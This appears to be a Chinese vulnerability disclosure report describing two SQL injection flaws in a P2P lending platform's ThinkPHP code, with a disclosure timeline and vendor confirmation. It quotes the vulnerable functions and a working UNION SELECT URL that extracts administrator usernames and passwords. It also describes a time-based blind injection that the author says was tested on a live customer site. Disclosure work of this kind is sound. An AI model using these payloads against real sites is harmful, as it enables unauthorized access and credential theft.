2015-09-10: 细节已通知厂商并且等待厂商处理中 2015-09-12: 厂商已经确认,细节仅向厂商公开 2015-09-15: 细节向第三方安全合作伙伴开放 2015-11-06: 细节向核心白帽子及相关领域专家公开 2015-11-16: 细节向普通白帽子公开 2015-11-26: 细节向实习白帽子公开 2015-12-11: 细节向公众公开
两处注入
注入1D:\WWW\App\Lib\Action\Member\DebtAction.class.php
public function agreement() { //获取文章模版 $article = M('article_category')->field('type_content')->where(array('type_nid'=>'zqht'))->find(); if( !empty($article['type_content']) ) { $article_html = $article['type_content']; $invest_id = $this->_get('invest_id','trim',0); $ht=M('hetong')->field('hetong_img,name,dizhi,tel')->find(); $this->assign('ht', $ht); $fields = "i.serialid, d.sell_uid,d.discount_gold,d.interest_rate, i.investor_capital,i.add_time,m.user_name" .",b.borrow_name,b.add_time as b_add_time,b.second_verify_time, b.id, b.borrow_interest_rate, b.total, b.has_pay"; $debt = M("debt d") ->field($fields) ->join(C('DB_PREFIX')."borrow_investor i ON i.parent_invest_id=d.invest_id") ->join(C('DB_PREFIX')."borrow_info b ON i.borrow_id=b.id") ->join(C('DB_PREFIX')."members m ON d.sell_uid=m.id") ->where("i.id={$invest_id}")->find(); if( !empty($debt) ) { //转让人真实姓名 $transfer_authentication = M('member_info')->field('idcard,real_name')->where(array('uid'=>$debt['sell_uid']))->find(); $borrow_investor = M('borrow_investor')->field("investor_uid,investor_capital,transfer_duration")->where(array('id'=>$invest_id))->find(); //不能过session获取,后期可直接移动到后台 if( !empty($borrow_investor) ) { //购买者真实姓名 $invest_authentication = M('member_info')->field('idcard,real_name')->where(array('uid'=>$borrow_investor['investor_uid']))->find(); } $debt['transfer_price'] = $debt['investor_capital']*(1-bcdiv($debt['discount_gold'], 100, 4)); if( $debt['borrow_type'] > BorrowModel::BID_CONFIG_TYPE_MORTGAGE ) { $debt['second_verify_time'] = $debt['b_add_time']; } } $web_name = $this->glo; //平台名称 $transfer_price = $borrow_investor['investor_capital']*(1-$debt['discount_gold']/100); //本金的转让价格,这里的转让信息不包含利息 $debt_fee_rate = get_global_setting('debt_fee'); $debt_fee = $transfer_price*$debt_fee_rate/100; //转让手续费 $healthy = array( "[web_name]", "[serialid]", "[add_time]", "[transfer_real_name]", "[transfer_idcard]", "[invest_real_name]", "[invest_idcard]", "[company_name]", "[domain]","[hetong_img]", "[transfer_capital]", "[transfer_price]", "[transfer_fee]", "[remain_days]", "[repayment_list]", ); $yummy = array( $web_name['web_name'], $debt['serialid'], date('Y年m月d日', $debt['add_time']), $transfer_authentication['real_name'], $transfer_authentication['idcard'], $invest_authentication['real_name'], $invest_authentication['idcard'], $ht['name'], DOMAIN, '<img class="hetongzhang" src="/'.$ht['hetong_img'].'" border="0">', $borrow_investor['investor_capital'], $transfer_price, $debt_fee, $borrow_investor['transfer_duration'] ); $newphrase = str_replace($healthy, $yummy, $article_html); $this->assign('article_html', $newphrase); } else { $this->error('系统有误,请联系网站客服!'); } $debt_total = $this->Debt->getAlsoPeriods($invest_id); $this->assign('debt_total', $debt_total); $buy_user = M("members")->field("user_name")->where("id={$debt['buy_uid']}")->find(); $this->assign('buy_user', $buy_user['user_name']); $this->assign('debt', $debt); $this->display(); } }
其中 $invest_id = $this->_get('invest_id','trim',0);这是tp里面的一个方法,就是通过$_GET获取参数然后通过trim处理。在trim之后就进入了sql里面
$debt = M("debt d") ->field($fields) ->join(C('DB_PREFIX')."borrow_investor i ON i.parent_invest_id=d.invest_id") ->join(C('DB_PREFIX')."borrow_info b ON i.borrow_id=b.id") ->join(C('DB_PREFIX')."members m ON d.sell_uid=m.id") ->where("i.id={$invest_id}")->find();
可以看到没单引号。这样就可以直接注入了。构造
http://192.168.142.143/member/debt/agreement?invest_id=1 UNION SELECT concat(user_name,0x5c,user_pass),2,3,4,5,6,7,8,9,10,11,12,13,14 from lzh_ausers
注入2D:\WWW\App\Lib\Action\Member\0authloginAction.class.php
public function del_oauth() { $id = $this->_get("id",'strip_tags', 0); $result = M("oauth")->where("id=".$id." and bind_uid=".$this->uid)->delete(); if($result){ $this->success('成功解除绑定', U('index')); }else{ $this->error('解除失败!'); } }
id通过get获取然后没有单引号就进入了sql里面。由于是detele后面的,所以只能盲注。
由于demo有安全狗所以用案例测试的
由于user()第一位为r 所以延时成功
这里是不成功
intval
危害等级:低
漏洞Rank:3
确认时间:2015-09-12 13:30
非常感谢您对绿麻雀安全的关注,已联系相关人员处理
暂无